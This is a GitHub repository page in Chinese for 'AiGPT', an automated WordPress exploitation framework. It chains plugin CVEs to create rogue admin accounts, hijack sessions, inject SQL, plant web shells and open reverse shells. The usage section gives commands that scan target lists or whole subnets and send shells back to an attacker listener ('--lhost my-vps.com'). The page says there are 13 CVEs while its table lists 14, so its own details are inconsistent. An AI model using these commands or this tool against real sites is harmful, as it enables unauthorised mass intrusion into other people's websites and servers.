AiGptCode/AiGPT-WordPress-Exploitation-Framework

GitHub: AiGptCode/AiGPT-WordPress-Exploitation-Framework

一款将 13 个未经身份验证的 WordPress 插件 CVE 整合在一起的自动化漏洞利用框架,能够从指纹识别到反向 Shell 实现一键化攻击。

Stars: 122 | Forks: 31

# AiGPT — 自动化 WordPress 漏洞利用框架 AiGPT 是一款多向量漏洞利用工具,可自动发现并攻破存在漏洞的 WordPress 站点。 它能对已安装的插件进行指纹识别,智能选择最佳漏洞利用方式,并返回一个反向 shell —— 通常无需任何事先身份验证。 **13 个未经身份验证的 CVE** 漏洞被整合到一个高性能框架中,专为合法的渗透测试和安全研究而设计。 [![Python 3.8+](https://img.shields.io/badge/python-3.8%2B-blue.svg)](#) [![License](https://img.shields.io/badge/license-MIT-green.svg)](LICENSE) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](#) ## 🔥 功能 - **多向量引擎** — 一款工具包含 13 条不同的漏洞利用路径 - **零授权创建管理员** — 在 7 个不同的易受攻击插件上创建 WordPress 管理员 - **Token / 会话劫持** — 窃取 API token 或劫持会话以获取管理员权限 - **直接执行 SQL** — 通过原始 SQL 注入插入管理员用户 - **直接文件上传** — 绕过整个登录链并立即植入 web shell - **智能插件指纹识别** — 并行探测 12 个插件以选择最佳攻击方式 - **基于优先级的向量选择** — 优先攻击已确认存在漏洞的插件 - **通用主题编辑器 shell** — 以管理员登录后,将反向 shell 注入到当前启用的主题中 - **CIDR 子网扫描** — 在整个网络范围内发现 WordPress 安装实例 - **多线程** — 可配置的线程数及自适应延迟 - **清晰的日志记录** — 控制台及文件输出均带时间戳 - **优雅的回退机制** — 自动跳过非 WordPress 目标 ## 📦 已利用的漏洞 (CVEs) | CVE | 插件 | 类型 | CVSS | |:---|:---|:---|:---| | CVE‑2025‑3102 | SureTriggers ≤1.0.78 | 身份验证绕过 → 创建管理员 | 9.8 | | CVE‑2025‑8489 | King Addons 24.12.92‑51.1.14 | AJAX 角色覆盖 | 9.8 | | CVE‑2025‑4334 | Simple User Registration ≤6.3 | 注册角色提权 | 9.8 | | CVE‑2025‑6934 | Opal Estate Pro ≤1.7.5 | 未经身份验证创建管理员 | 9.8 | | CVE‑2025‑8572 | Truelysell Core ≤1.8.7 | `user_role` 参数滥用 | 9.8 | | CVE‑2025‑68860 | Mobile Builder ≤1.4.2 | JWT 身份验证绕过 | 9.8 | | CVE‑2025‑13618 | Mentoring ≤1.2.8 | 角色限制绕过 | 9.8 | | CVE‑2025‑11749 | AI Engine ≤3.1.3 | Token 窃取 → 获取管理员权限 | 9.8 | | CVE‑2025‑34077 | Pie Register ≤3.7.1.4 | 会话劫持 | 9.8 | | CVE‑2025‑13342 | Frontend Admin ≤3.28.20 | 任意选项修改 → 获取管理员权限 | 9.8 | | CVE‑2025‑12061 | Tax Service HDM <1.2.1 | 任意 SQL 执行 | 8.6 | | CVE‑2025‑6440 | WooCommerce Dynamic Pricing | 文件上传 → RCE | 9.8 | | CVE‑2026‑0740 | Ninja Forms File Uploads ≤3.3.26 | 文件上传 → RCE | 9.8 | | CVE‑2026‑4882 | User Reg Advanced Fields ≤1.6.20 | 文件上传 → RCE | 9.8 | ## 🚀 快速入门 ### 前置条件 - Python 3.8+ - `pip install requests` - (可选)针对 Mobile Builder 向量可执行 `pip install pyjwt` ### 基本用法 ``` # 目标 URL 列表 python aigpt.py --targets wp_sites.txt --lhost 10.0.0.5 --lport 4444 # 扫描整个子网 python aigpt.py --subnet 192.168.1.0/24 --lhost 10.0.0.5 --lport 4444 --threads 20 # Fine‑tune 性能 python aigpt.py --targets top1000.txt --lhost my-vps.com --lport 1337 --threads 30 --delay 0.3 ```
标签:CIDR网段扫描, CISA项目, CVE批量扫描, Python安全工具, Web Shell上传, Web安全, Web报告查看器, WordPress漏洞利用, XXE攻击, 协议分析, 反弹Shell, 多线程并发扫描, 插件指纹识别, 插件系统, 未授权访问漏洞, 权限提升, 漏洞利用链, 管理员账户创建, 红队武器库, 网络安全, 自动化攻击引擎, 自动化渗透测试框架, 蓝队分析, 逆向工具, 隐私保护